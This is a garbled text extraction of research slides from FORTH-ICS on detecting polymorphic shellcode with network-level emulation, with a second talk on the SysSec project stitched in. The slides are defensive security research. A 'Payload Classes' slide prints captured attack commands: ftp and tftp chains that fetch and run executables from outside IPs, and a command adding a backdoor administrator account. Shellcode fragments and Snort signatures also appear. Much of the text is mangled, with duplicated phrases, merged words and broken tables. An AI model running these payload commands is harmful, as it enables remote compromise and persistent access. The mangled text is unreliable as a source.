real-world polymorphic y p attack detection
TRANSCRIPT
http://www.ics.forth.gr/dcs
Real-world Polymorphic http://www.ics.forth.gr/dcs
y pAttack Detection
Michalis Polychronakis, Evangelos MarkatosDistributed Computing Systems LabFORTH-ICS, Crete Greece
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Outlinehttp://www.ics.forth.gr/dcs
• Introduction to the problem: shell code• Introduction to the problem: shell code attacks – buffer overflows
• Polymorphic attacks (self modifying shell-code) )
• Network-level Emulation (NEMU) • Findings from real-world deployment• ConclusionConclusion
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
• Malware and Botnetshttp://www.ics.forth.gr/dcs
port scanning
click fraud
extortion
phishing illegal content
DDoS
malicious websites
code injection
spammalicious websites
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
http://www.ics.forth.gr/dcs
• How?• How?• social engineering (phishing, spam, scareware, …)
• viruses (disks, CD-ROMs, USB sticks, warez, …)
• network traffic interception ( d i l• network traffic interception (access credentials, keys, …)
pass ord g essing• password guessing (brute force, root:12345678, …)
• physical access (reboot, keylogger, screwdriver, …)p y• software vulnerability exploitation
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Code Injection Attackshttp://www.ics.forth.gr/dcs
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Remote Code-injection Attackshttp://www.ics.forth.gr/dcs
• Code-injection attacks persistCode injection attacks persist– Among the most common methods for remote system
compromise– e.g., Conficker (MS08-067)
• Mechanics1 Send malicious request to network service2 Divert the execution flow of the vulnerable process
• Buffer Overflow– (Stack/heap/integer overflow, format string abuse, …)
3 Execute the injected code (shellcode)3 Execute the injected code (shellcode)• Performs arbitrary operations under the privileges of the
vulnerable process
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00
What is a buffer overflow?http://www.ics.forth.gr/dcs
void f ( int x ) Runtime Stack
...( ){char buffer[10] ;
Stack
char buffer[10] ; scanf(“%s”, &buffer) ;// other code
buffer[10]
} Return address
What if the input data is longer than 10 bytes?
Function CallArguments
...Calling functions
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
What is a buffer overflow?http://www.ics.forth.gr/dcs
Smashed Stack
• Buffer overflow Att k t d
...• Attacker puts code
– i.e. execve(/bin/sh)I b ff [10] Machine Code:– In buffer[10]
• And transfers control to it
Machine Code:execve(/bin/sh)buffer[10]
control to it • Via the return
address Function Call
Overwritten return address
address Function CallArguments
..Calling functions
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
.Calling functions
Attacks – Defenses Coevolutionhttp://www.ics.forth.gr/dcs
Attack DefensePlain Shellcode
Attack Defense
String SignaturesSimpleSimple
Obfuscation Regexp SiSignatures
Naive Polymorphism
Static AnalysisSelf-modifying
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Self modifying code Emulation
Polymorphic Shellcodehttp://www.ics.forth.gr/dcs
PC PC PC
\x6A\x0F\x59xE8\xFF\xFF
PC PC
\xE8\xE8\xFF\xE8\xFF\xFF\xE8\xFF\xFF\xC1
…
\xE8\xFF\xFF\xC1\x6B\x80\xE8\xFF\xFF\xFF\xFF\xE1
PC
decryptor encrypted payloaddecrypted payload
• Self-decrypting code– The actual shellcode is not revealed until runtime
• Shellcode “packing” has become essential– IDS Evasion– Avoidance of restricted bytes in the attack vector
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
http://www.ics.forth.gr/dcs
Shellcode as seen on the iwire
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
http://www.ics.forth.gr/dcs
Actual decrypted payloadyp p y
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Code Obfuscationhttp://www.ics.forth.gr/dcs
• Problem: obfuscated polymorphic shellcode can• Problem: obfuscated polymorphic shellcode can be highly evasive
Each attack instance looks different from each other– Each attack instance looks different from each other Difficult to fingerprint
– Self-modifying code can hide the real malicious codeDifficult to statically analyze
R l CFG
?
Ob d
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Real CFGObserved CFG
Network-level Emulationhttp://www.ics.forth.gr/dcs
• Motivation: Self-modifying shellcode will not• Motivation: Self-modifying shellcode will not reveal its actual form until it is executed on the victim hostvictim host
• Main idea: execute each network request as if it were executable codewere executable code– Resilience to code obfuscation
• Identify the inherent execution behaviorof polymorphic shellcode– Focus on the decryption process– Generic, independent of the
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
exploit/vulnerability/OS
Nemuhttp://www.ics.forth.gr/dcs
GET /ind ex php HT TP/1 1 Hos\x6A\x0F\x5 \xE8\xFF\xF \xFF\xFF\xCGET /ind ex.php HT TP/1.1 Hos …9 F 1 …
GET /index.php HTTP/1.1 Host: www.foo.com …
inc ediG Random code
\x6A\x0F\x59\xE8\xFF\xFF\xFF\xFF\xC1\x5E\x80… …
push byte +0x7f6A07 Polymorphic scinc ediinc ebppush espand [edi],chimul ebp,[esi+0x64],dword 0x702e7865push dword 0x54482070
GET/index.php HT
Random codepush byte +0x7fpop ecxcall 0x7inc ecxpop esiadd [esi+0xa],0xe0
6A0759E8FFFFFFFFFFC15E80460AE0
Polymorphic sc
GetPC code (for ppush esppush eaxdasxor [esi],ebpxor [eax],esp
pTP
1.1
Usually crashes after a few instructions
xor [esi+ecx+0xb],clloop 0xexor [esi+ecx+0xb],clloop 0xexor [esi+ecx+0xb],cl
304C0E0BE2FA...
finding its place in memory)
benign request......
malicious ...
Lots of self memory references
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
request!
Real World Deployment - Europehttp://www.ics.forth.gr/dcs
• ~1 2 million attacks to/from real hosts in• 1.2 million attacks to/from real hosts in– 3 National Research Networks (NRNs) in Europe
1 Educational Network in Greece– 1 Educational Network in Greece• April 2007 – October 2008
Networ Total # External Internalk attacks #attacks #srcIP #dstIP #attacks #srcIP #dstIP
NRN1 1240716 396899 (32.0%) 10014 769 843817
(68.0%) 143 331572( ) ( )
NRN2 12390 2617 (21.1%) 1043 82 9773 (78.9%) 66 4070
NRN3 1961 441 (22.5%) 113 49 1520 (77.5%) 8 1518
13579
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
EDU 20516 13579 (66.2%) 3275 410 6937 (33.8%) 351 2253
Overall Activity: External Attacks
http://www.ics.forth.gr/dcs
23 ports
413,536 attacks
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Overall Activity: Internal Attackshttp://www.ics.forth.gr/dcs
• Large attack volume due to infected hosts• Large attack volume due to infected hosts– Against hosts inside and outside the organization
862,083 attacks
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Attacked Serviceshttp://www.ics.forth.gr/dcs
21 FTP25 SMTP42 WINS
453 CreativeServer1023 W32.Sasser's FTP server1025 MS RPC
2967 Symantec21 FTP25 SMTP42 WINS
453 CreativeServer1023 W32.Sasser's FTP server1025 MS RPC
2967 Symantec2968 Symantec3050 Borland InterBase DB
80 Web110 POP3135 Location
service
80 Web110 POP3135 Location
service
1029 DCOM (alternative)1082 WinHole trojan1433 MS SQL server2000 ShixxNOTE 6.net
server5000 MS UPnP/SSDP5554 W32.Sasser's FTP server6881 P2P file sharing client
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
139 NETBIOS143 IMAP445 SMB
139 NETBIOS143 IMAP445 SMB
messenger2100 Oracle XDB FTP server2103 MS Message Queuing
service
30708 unknown41523 CA BrightStor Agent (MS
SQL)
Shellcode Diversityhttp://www.ics.forth.gr/dcs
• In most cases, the number of unique shellcodes h i i bl h bas seen on the wire is comparable to the number
of attacksP l hi
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
– Polymorphism– Variable fields in the initial shellcode
Payload Classeshttp://www.ics.forth.gr/dcs
Class #Class # TypesConnectExe 17
cmd /c echo open 208.111.5.228 2755 > i& echo user 1 1 >> i& echo get 2k3 exe >> i
cBindExec 9
& echo get 2k3.exe >> i& echo quit >> i& ftp ‐n ‐s:i& 2k3.exe
HTTPExec 5BindShell 4
& del i
cmd exe /c net user Backupadmin AddUser 3FTPExec 2
cmd.exe /c net user Backupadmin corrie38 /ADD&& net localgroup Administrators Backupadmin /ADD
TFTPExec 1p
tftp.exe ‐i 82.82.252.96 get runsvc32.exe
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Doubly-encrypted shellcodehttp://www.ics.forth.gr/dcs
First layer: alpha_mixed variationSecond layer: countdown variation
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Referenceshttp://www.ics.forth.gr/dcs
• Zacharias Tzermias, Giorgos Sykiotakis, Michalis Polychronakis, and E l P M k t C bi i St ti d D i A l i f thEvangelos P. Markatos. Combining Static and Dynamic Analysis for the Detection of Malicious Documents. In Proceedings of the 4th European Workshop on System Security (EuroSec). April 2011, Salzburg, Austria.
• Michalis Polychronakis, Kostas G. Anagnostakis, Evangelos P. Markatos. y , g , gAn Empirical Study of Real-world Polymorphic Code Injection Attacks. In Proceedings of the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET) 2009.
• Michalis Polychronakis Kostas G Anagnostakis and Evangelos P• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Real-World Polymorphic Attack Detection using Network-Level Emulation. In Proceedings of the Cyber Security and Information Intelligence Research Workshop (CSIIRW). May 2008, Oak Ridge, TN Mi h li P l h ki K t G A t ki d E l P• Michalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Emulation-based Detection of Non-self-contained Polymorphic Shellcode. In Proceedings of the 10th International Symposium on Recent Advances in Intrusion Detection (RAID). September 20072007,
• Miichalis Polychronakis, Kostas G. Anagnostakis, and Evangelos P. Markatos. Network-level Polymorphic Shellcode Detection using Emulation. In Proceedings of the GI/IEEE SIG SIDAR Conference on
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Emulation. In Proceedings of the GI/IEEE SIG SIDAR Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA). July 2006
Summaryhttp://www.ics.forth.gr/dcs
• Pattern matching/static analysis notPattern matching/static analysis not enough
Highly polymorphic and self modifying code– Highly polymorphic and self-modifying code• Network-level emulation
– Detects self-modifying polymorphic shellcode• Remote code-injection attacks are still a j
major threat– Increasing sophisticationIncreasing sophistication
• Attackers have also turned their attention to less widely used services and third
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
to less widely used services and third-party applications
http://www.ics.forth.gr/dcs
Real-world Polymorphic http://www.ics.forth.gr/dcs
y pAttack Detection
Michalis Polychronakis, Evangelos MarkatosDistributed Computing Systems LabFORTH-ICS, Crete Greece
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
SysSec: A European Network of Excellence in Managing Threats and Vulnerabilities in
the Future Internet
Evangelos Markatos FORTH-ICS
[email protected] - ASPLOS Mini Symposium 2011 26
RoadMap of the talkRoadMap of the talk
Security Challenges: What is the problem? Hackers are getting more sophisticated The impact of cyberattacks is getting
larger What will we do?
SysSec: 4-year NoE to consolidate Research in managing threats for the Future Internet
[email protected] - ASPLOS Mini Symposium 2011 27
RoadMapRoadMap
Security Challenges: What is the problem? Hackers are getting more sophisticated The impact of cyberattacks is getting
larger What will we do?
SysSec: 4-year NoE to consolidate Research in managing threats for the Future Internet
[email protected] - ASPLOS Mini Symposium 2011 28
What is the impact of attacks?What is the impact of attacks?
“… potential (cyber)attacks against network infrastructures may have widespread and devastating consequences on our daily
life: no more electricity or water at home rail and planelife: no more electricity or water at home, rail and plane accidents, hospitals out of service”
Viviane RedingViviane Reding, Vice President European Commission
[email protected] - ASPLOS Mini Symposium 2011 29
Government: The Parliament under attackGovernment: The Parliament under attack
[email protected] - ASPLOS Mini Symposium 2011 30
Transportation: No train signalsTransportation: No train signals
[email protected] - ASPLOS Mini Symposium 2011 31
Defense: fighter planes groundedDefense: fighter planes grounded
[email protected] - ASPLOS Mini Symposium 2011 34
What about our lives? Are they next?What about our lives? Are they next?
[email protected] - ASPLOS Mini Symposium 2011 35
RoadMapRoadMap
Security Challenges: What is the problem? Hackers are getting more sophisticated The impact of cyberattacks is getting
larger What will we do?
SysSec: 4-year NoE to consolidate Research in managing threats for the Future Internet
[email protected] - ASPLOS Mini Symposium 2011 36
What’s next?What s next?
SysSec: managing threats and vulnerabilities for the future Internet a Network of Excellence (2010-2014) Why?
We need to work towards solutions We need to collaborate
At a European level– At a European level– With our international colleagues
» Around the world
Poli. di Milano (IT) Vrije Universiteit (NL)
BAS (Bulgaria) TU Vienna (Austria)
TUBITAK (Turkey) FORTH – ICS (Greece)
[email protected] - ASPLOS Mini Symposium 2011 37
j ( ) Institute Eurecom (FR)
( ) Chalmers U (Sweden)
( )
What is SysSec?What is SysSec? SysSec proposes a game-changing
h t b itapproach to cybersecurity: Currently Researchers are mostly reactive:
they usually track cyberattackers after an attack has been launched
thus researchers are always one step behind attackersthus, researchers are always one step behind attackers
SysSec aims to break this vicious cycle Researchers should become more proactive:Researchers should become more proactive:
Anticipate attacks and vulnerabilities Predict and prepare for future threats Work on defenses before attacks materialize.
[email protected] - ASPLOS Mini Symposium 2011 38
SysSec Aim and Objectives (I)SysSec Aim and Objectives (I)
Create an active, vibrant, and collaborating community, , g yof Researchers with the expertise, capacity, and determination to anticipate and
iti t th i th t d l biliti th F tmitigate the emerging threats and vulnerabilities on the FutureInternet.
SysSec aimsSysSec aims to create a sense of ``community'' among those researchers, to mobilize this community, to consolidate its efforts, to expand their collaboration internationally, and
b th i l i t f f f S t S it become the single point of reference for Systems Securityresearch in Europe.
[email protected] - ASPLOS Mini Symposium 2011 39
SysSec Aim and Objectives (II)SysSec Aim and Objectives (II)
Advance European Security Research well beyond the p y ystate of the art research efforts are fragmented SysSec aims to provide a research agenda and align their research activities with the agenda
make SysSec a leading player in the international arena make SysSec a leading player in the international arena.
[email protected] - ASPLOS Mini Symposium 2011 40
SysSec Aim and Objectives (III)SysSec Aim and Objectives (III)
Create a virtual distributed Center of Excellence in the area of emerging threats and vulnerabilities. By forming a critical mass of European Researchers and by
li i th i ti itialigning their activities, Have the gravitas needed to play a leading role internationally,
empowered to undertake large-scale, ambitious and high-impact p g , g presearch efforts.
Create a Center of Academic Excellence in the area create an education and training program targeting young
researchers and the industry. lay the foundations for a common graduate degree in the area lay the foundations for a common graduate degree in the area
with emphasis on Systems Security.
[email protected] - ASPLOS Mini Symposium 2011 41
SysSec Aim and Objectives (IV)SysSec Aim and Objectives (IV)
Maximize the impact of the project by proactive p p j y pdissemination to the appropriate stakeholders. disseminate its results to international stakeholders so as to form
th d d t t i t hi ( ith i il j t dthe needed strategic partnerships (with similar projects and organizations overseas) to play a major role in the area.
dissemination within the Member States will reinforce SysSec's role as a center of excellence and make SysSec a beacon for a new generation of European Researchers.
Create Partnerships and transfer technology to the Create Partnerships and transfer technology to the European Security Industry. create a close partnership with Security Industrycreate a close partnership with Security Industry facilitate technology transfer wherever possible to further
strengthen the European Market.
[email protected] - ASPLOS Mini Symposium 2011 42
SysSec: How can you collaborateSysSec: How can you collaborate Contribute to the research roadmap/agendap g
Provide feedback on emerging threats Share your ideas on future security issues y y
Contribute to our “systems security” University curriculumcurriculum Contribute homeworks/exams Contribute/use lab exercises Contribute/use lab exercises Teach some of the courses at your University Share some of your course material Share some of your course material
Become an “Associated Partner” of the project
[email protected] - ASPLOS Mini Symposium 2011 43
Summary http://www.ics.forth.gr/dcs
• DCS• DCS– Conducts R&D in large-scale infrastructures – Designed and implemented of LOBSTER: the
largest academic European Internet monitoring infrastructure
– Headed the design and implementation of the g pNoAH Honeypot infrastructure
– Heads SysSec: the largest European NetworkHeads SysSec: the largest European Network of Excellence in systems Security
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
http://www.ics.forth.gr/dcs
Real-world Polymorphic http://www.ics.forth.gr/dcs
y pAttack Detection
Michalis Polychronakis, Evangelos MarkatosDistributed Computing Systems LabFORTH-ICS, Crete Greece
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
http://www.ics.forth.gr/dcs
fallback slides
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Attack Trace Repositoryhttp://www.ics.forth.gr/dcs
• http://lobster ics forth gr/trac• http://lobster.ics.forth.gr/traces/
P bli– Public access• Full payload traces of some
of the captured attacks• Tricky anonymizationTricky anonymization
– Application-level protocolsneed to be carefullyneed to be carefullyanonymized
– Sensitive information in the
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Sensitive information in the encrpyted payload!
Ongoing/Future Workhttp://www.ics.forth.gr/dcs
• New detection heuristics• New detection heuristics– Plain/metamorphic shellcode (no self-modifications)
Host dependent shellcode– Host-dependent shellcode– Client-side attacks
Other languages (e g Javascript)– Other languages (e.g., Javascript)• Improved CPU emulator
– Faster– Complete instruction set
• Analyze captured attacks– and the related malware binaries
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
Detection Heuristichttp://www.ics.forth.gr/dcs
1 GetPC code1 GetPC code– The decryptor must find the absolute address of
the encrypted payload for accessing it (notthe encrypted payload for accessing it (not known in advance)
ll f t /f t f /f– call, fstenv/fnstenv, fsave/fnsave
2 Self-references
self-referencesGetPC code random reads– The decryptor reads from several distinct
memory locations in its own body
polymorphic shellcodebenign input
random code
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
po y o p c s e codebe g pu
Polymorphic Shellcode Engineshttp://www.ics.forth.gr/dcs
• Off-the-shelf polymorphic shellcode engines• Original shellcode is 128 bytes, 1000 mutations with each
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
g y ,engine
• In all cases the shellcode is decrypted correctly
Passive Network Monitoringhttp://www.ics.forth.gr/dcs
• Examine the network traffic as it passes by…– Packet capture (tcpdump),
NetFlow, …• Non-intrusive: invisible on
th t kthe network– vs. active monitoring (e.g., ping)
M li ti• Many applications– Performance Measurements
I t i d t ti– Intrusion detection– Traffic characterization
Network trouble shooting
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/
– Network trouble-shooting– Network planning
Example Snort Signatureshttp://www.ics.forth.gr/dcs
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE Linux shellcode"; content:"|90 90 90 E8 C0 FF FF FF|/bin/sh"; classtype:shellcode-detect; sid:652; rev:9;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE x86 setuid 0"; content:"|B0 17 CD 80|";classtype:system-call-detect; sid:650; rev:8;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 10202:10203 (msg:"CA license GCR overflow attempt"; flow:to_server,established;content:"GCR NETWORK<"; depth:12; offset:3; nocase;content: GCR NETWORK< ; depth:12; offset:3; nocase;pcre:"/^\S{65}|\S+\s+\S{65}|\S+\s+\S+\s+\S{65}/Ri"; sid:3520;)
Evangelos Markatos markatos AT ics.forth.gr http://www.cs.rochester.edu/meetings/ASPLOS-mini-symp-12/